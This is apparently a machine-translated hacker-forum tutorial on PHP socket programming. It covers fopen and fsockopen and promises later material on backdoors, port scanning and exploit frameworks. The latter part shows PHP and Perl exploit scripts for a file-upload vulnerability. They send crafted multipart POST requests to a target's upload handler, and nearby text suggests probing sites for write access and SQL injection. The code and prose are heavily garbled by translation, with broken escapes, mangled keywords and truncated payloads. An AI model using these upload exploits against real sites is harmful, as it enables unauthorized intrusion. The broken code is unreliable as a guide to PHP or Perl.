Learn PHP for 2 months, there are very many gains. But with others is that I prefer socket.php articles in Socket. There is too little article. So I decided to write a series of PHP-Socket reading notes. I have always written from the most basic Socket_RAW.
Example Experience. Example will have port forwarding (breakthrough firewall), mobile network type Exp, port scan, PHP back door, hair bag type Exp framework. Due to learning, you can only write one. Everyone is put into the PHP shell program.
Preface:
PHP is one of the most popular scripting languages in the world. It has always been widely used in Web programming. What I want to say is that PHP is not only in the web, but also excellent in Shell. It is just that people are more accustomed to prepare shell scripts with Perl. This is a PHP master, which is just a book notes for a few weeks. Please ask if there is a wrong place. You can also give me Mail to discuss PHP.
Front knowledge:
PHP is most attractive to me is Sockets extension, in fact I will simply VB Winsock, fully use VB to write a common WINSOCK program. But I still chose PHP. Because it is cross-platform.
PHP default is not supported by advanced sockets, only support for "package" fsocken and other functions. Socket is an extension of PHP, you need to set it to support it. PHP needs to be set in Windows. INI, in PHP. INI; Windows Extensions, remove; extension = php_sockets.dll's previous semicolon. That's OK. * NIX The following is to join the -enable-sockets command when compiling. When you do not use the DL () function, your PHP must be pHP_sockets.dll at the same directory. Ok, complete the PHP Socket configuration.
Below is the problem of running.
It is simple to run the PHP script under the terminal. Windows C: /PHP/PHP.EXE -Q Test.php, * NIX To declare the PHP in advance, just like Perl. Like #! / Usr / local / bin / php -q., Then come back ./test.php. The parameter Q means that the PHP header information is not output.
Enter parameter issues:
Some people say how PHP shell enters parameters. In the web, you can enter the parameters http://xx.com/aa.php? Parameter 1 = xxxx & parameter 2 = SSSSSS. It doesn't matter whether PHP is the same as Perl, has similar parameters. To see the official description
"Argv"
Parameters passing to this script. When the script runs in the command line mode, the Argv variable passes the command line parameters of the program C language style. When the GET method is called, the variable contains the requested data.
ARGC "
A number of command line parameters that passed to the program (if run in command line mode).
Oh, simply say. See me for an example
IF ($ argc! = 4 || in_Array ($ argc [1], array ('- help', '- h', '?'))))
{
Echo "by Darkness [BST] .we Will Come Back Soon! / R / N";
echo "------------------------------------------------ / r / n ";
echo "c: / php/P.exe -q uploadexp.php
http://www.bugkidz.org/UPload.php filepath / r / n ";
echo "------------------------------------------------ / r / n ";
}
$ host = $ argv [1]; $ URL = $ argv [2];
$ PATH = $ Argv [3];
?>
I think you should understand, here Argc [0] refers to the program itself. It can also come.
Printf (% s, $ argv [1]);
The previous paragraph talks about the operation of the command line. Please refer to more
http://www.php.net/manual/en/features.commandline.php
1.FOpen application
Fopen can also be referred to as a packaged socket function. Not only used for file reading, but also for socket. FOPEN is equivalent to other advanced INET controls / classes, which is more advanced for URL operations than fsockinken.
How to use FOPEN
$ S = FOPEN ($ URL, MODE);
FOPEN's Mode property:
Mode description
The 'R' read-only mode opens, pointing the file pointer to the file header.
The 'R ' Read and write mode opens, and the file pointer points to the file header.
'W' write mode opens, pointing the file pointer to the file header and intercepts the file size zero. If the file does not exist, try to create it.
The 'W ' read and write mode opens, pointing the file pointer to the file header and cutting the file size zero. If the file does not exist, try to create it.
The 'A' write is opened, and the file pointer points to the end of the file. If the file does not exist, try to create it.
The 'A ' read and write mode opens, pointing the file pointer to the end of the file. If the file does not exist, try to create it.
'X' creation and opens in mode, pointing the file pointer to the file header. If the file already exists, the fopen () call failed and returned False and generated an E_WARNING level error message. If the file does not exist, try to create it. This is the equivalent of the OPEN (2) system call to the underlying Open (2) system. This option is supported by PHP 4.3.2 and later versions, only for local files.
'X ' creates and opens the read and write mode, pointing the file pointer to the file header. If the file already exists, the fopen () call failed and returned False and generated an E_WARNING level error message. If the file does not exist, try to create it. This is the equivalent of the OPEN (2) system call to the underlying Open (2) system. This option is supported by PHP 4.3.2 and later versions, only for local files.
That is, the operation of the local file can also be used for inet. Is it very kool?
If you want to test a station's IIS directory is written.
Can write this way
$ S = FOPEN ("http://www.bugkidz.org", "x ") or Die ("No write permission")
If you exist, you can continue to construct the following statement. Write files remotely with FWRITE.
But the general website is read-only.
$ S = FOPEN ("http://www.bugkidz.org/index.php?id=1", "r");
This will be read into the content of http://www.bugkidz.org/index.php?id=1, but it has to be processed to get the complete file content.
such
While (! Feof ($ s)) {
Echo fgets ($ S, 1024);
}
I think fopen is the most convenient for SQL INJECTION.
Function PHPINET ($ URL)
{
FOPEN ($ URL, "R") or Die ("Open URL Error");
While (! Feof ($ s)) {
$ cahe = fgets ($ s, 1024);
Retrun $ cahe;
Fclose ($ s)
}
This function is equivalent to inet.openurl in VB
The use of the FSockopen function is also a Class of Socket functions that are encapsulated. It is a bit similar to the Winsock control in VB. Unfortunately, it supports active socket connection, does not support BIND, LISTEN, etc. If you need to implement these features, you should use advanced Socket programming in PHP. Even so, the fsockopen function can also meet most of the needs. Use fsockopenresource fsockopen (string target, int port [, int errno [, string errstr [float timeout]])
Example: $ sock = fsockopen ("192.168.0.1", 80, $ errno, $ errstr, 30); the front 2 is the address and port, the middle 2 is the variable of the error, and finally Timeout is set. Usually $ sock = fsockopen ("192.168.0.1", 80); so. $ SOCK = FSOCKOPEN ("192.168.0.1", 80); this is a typical TCP connection. UDP is connected to $ sock = fsockopen ("udp: //192.168.0.1", 53); use this to write a TFTP client is also possible.
FSOCKOPEN application example:
Example 1 Simple HTTP session.
Code
/ n"; } Else {$ out = "get / http / 1.1 / r / n"; $ out. = "Host: www.example.com/r/n"; all.t. =" Connection: Close / R / N / R / N "; FWRITE ($ fp, $ out); while (! feof ($ fp)) {echo fgets ($ fp, 128);} fclose ($ fp);}?>
The process is generally such a FSOCKOPEN resource, defining the sending content, writes the definition content with the fwrite function or the FPUTS function, and the output of the line is obtained until the end of the file is reached, the FGETS function or FREAD is used. Use fclose to close the established FsockOpen resource. Angel wrote a PHP port scan tool, posted http://www.4ngel.net/Article/20.htm
Select FsockOpen to write the simple Exp Send frame. It is definitely a goodidea. Becoz it's so easy. Look at my PHP upload vulnerability EXP. Code
/ r / n "." ---------------------------- 7D41F4A600472 - / R / N "." / r / N "; $ header =" post /index.php?action=upload http / 1.1 / r / n "." Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, Application / Msword Application / X-ShockWave-Flash, * / * / r / n "." REFERER: http://127.0.0.1/index.php?path=./r/n"."accept-language: zh-cn /R/n"."content-type: multipart / form-data; boundary = -------------------------- 7D41F4A600472 / R / n "." accept-encoding: gzip, deflate / r / n "." User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1. 1.4322) / r / n "." Host: 127.0.0.1/r/n "" "" / r / n "." Connection: Keep-alive / r / n "." Cache -Control: No-cache / R / N "." Cookie: phpsessid = 111111111111111111111111111111111111111111111111111111111 / r / n "; FPUTS ($ SOCK, $ header); Sleep (1); FPUTS ($ SOCK, $ body); While (! Feof ($ suck)) {echo fgets ($ sock, 128);} fclose ($ suck);?>
Let's take a look at XIAOLU using Perl written EXP code.
#! / usr / bin / perl $ | = 1; Use socket; $ host = "127.0.0.1"; $ port = "80"; $ uploadto = "; $ str =" -------- -------------------- 7D41F4A600472 / R / N "." Content-Disposition: form-data; name = / "PATH /" / R / N ". "/R/n"www.ppp�/R/N" "----------------------------7D41F4A600472 /R/n"."content-disposition: form-data; name = / "image /"; filename = / "f: //tools//1.gif/" / r / n "." Content-Type: TEXT / PLAIN / R / N "." / r / n "." "?> / r / n". "?> / r / n". "- ---------------------------- 7D41F4A600472 - / R / N "." / R / n "; Print $ Str; $ LEN = Length ($ STR); Print $ LEN; $ REQ = "Post / 1/1/3721/index.php?action=upload http / 1.1 / r / n". "Accept: image / gif, image / x- Xbitmap, Image / JPEG, Image / Pjpeg, Application / MSWORD, Application / X-ShockWave-Flash, * / * / R / N "." Referer: http://127.0.0.1/index.php?path=./ R / N "." accept-language: en-cn / r / n "." Content-type: multipart / form-data; boundary = ------------------------------------------------------------------------------------------------------ -------- 7D41F4A600472 / R / N "." Accept-encoding: gzip, deflate / r / n "." User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.2; Hotbar 4.4 .6.0; .NET CLR 1.1 .4322) / r / n "." Host: 127.0.0.1/r/n "" "" CACHE-Control "." Cache-Control "." Cache-Control "." Cache-control : No-cache / r / n "." Cookie: phpsessid = 111111111111111111111111111111111111111111111111111 / r / n "." $ STR / R / N / R / N "; Print $ Req; @res = sendRAW ($ REQ); Print @res; #hmm ... Maybe you can send it by other ways, @_; my $ target; $ target = inet_aton ($ host) || Die (" INET_ATON PROBLEMS / N ");
